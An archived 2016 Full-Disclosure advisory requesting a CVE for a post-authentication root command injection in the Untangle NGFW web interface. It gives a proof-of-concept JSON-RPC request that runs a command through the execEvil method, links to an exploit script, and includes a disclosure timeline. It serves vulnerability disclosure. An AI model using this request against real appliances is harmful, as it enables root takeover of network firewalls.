lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 27 Jun 2016 17:36:11 +1000 (AEST)
From: Matt Bush <matt@...cyte.net>
To: fulldisclosure@...lists.com, submissions@...ketstormsecurity.com
Cc: bugtraq@...urityfocus.com
Subject: [fd] CVE ID request: Untangle NGFW <= v12.1.0 post-auth command
 injection

Product: 

https://www.untangle.com/untangle-ng-firewall/

Description:

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') 

The Untangle NGFW <= 12.1.0 web interface is prone to a command injection vulnerability, allowing non-root users to execute arbitrary commands with root privileges and gain remote shell access to the appliance. 

This vulnerability can be triggered via modifying any request made via functionality accessible from the Network->Troubleshooting->Network Tests window using an intercepting proxy or with otherwise crafted requests to abuse the execEvil() function.

The appliance web interface is accessible via unsecured HTTP by default. This leaves the appliance vulnerable to Man-in-the-Middle attacks that allow attackers to intercept plaintext credentials, facilitating exploitation of this vulnerability for further elevation of privileges.

Solution:

No official solution is currently available. Restrict access, consider Administrator interface access equivalent to root privileges.

Vulnerability Discovery:
Matthew Bush (The Missing Link)

Proof of Concept:
With a local intercepting proxy, alter the "params" field for any POST request to execEvil to execute any arbitrary command (eg, using the Ping Test) once logged in and assigned a nonce value for the session:

---

POST http://192.168.68.154/webui/JSON-RPC HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: text/plain
Content-Length: 99
Cookie: JSESSIONID=3C6A2963EFB628FA83AF6B6563222C6F; pysid=ce0629f79bd506f9543381e7eb7d7b7a
Connection: keep-alive
Host: 192.168.68.154

{"id":5,"nonce":"fbejsu4c77toq8a5igr1320i2p","method":".obj#2082962752.execEvil","params":["id"]}

---

Exploit:
https://github.com/3xocyte/Exploits/blob/master/untangle-ngfw-12.1-ci.py

Disclosure Timeline:
22/4/2016			Attempted to contact vendor after discovery of vulnerabilities
6/5/2016			No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
12/5/2016			US-CERT confirms contacting vendor
16/6/2016			US-CERT notifies of no response from vendor, suggested requesting CVE-ID via mailing list
27/6/2016 			Public disclosure

Discovery Credit:
Matt Bush (@3xocyte)
The Missing Link (Sydney, Australia)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ